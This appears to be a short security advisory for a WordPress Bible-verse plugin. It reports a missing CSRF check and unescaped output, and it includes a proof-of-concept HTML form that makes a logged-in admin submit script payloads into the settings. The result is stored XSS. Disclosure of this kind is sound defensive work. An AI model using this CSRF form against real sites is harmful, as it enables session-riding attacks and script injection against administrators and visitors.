The plugin is lacking any CSRF check when saving its settings and verses, and do not sanitise or escape them when outputting them back in the page. This could allow attackers to make a logged in admin change the settings, as well as add malicious verses containing JavaScript code in them, leading to Stored XSS issues
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=telugu-bible-verse-daily%2FTeluguBibleVersedisplay.php" method="POST">
<input type="hidden" name="tvd_post_type" value="fav" />
<input type="hidden" name="tvd_connection" value="fopen" />
<input type="hidden" name="chapter" value="<script>alert(/XSS1/)</script>" />
<input type="hidden" name="verse" value="<script>alert(/XSS2/)</script>" />
<input type="hidden" name="verse_add" value="Add Verse รยป" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>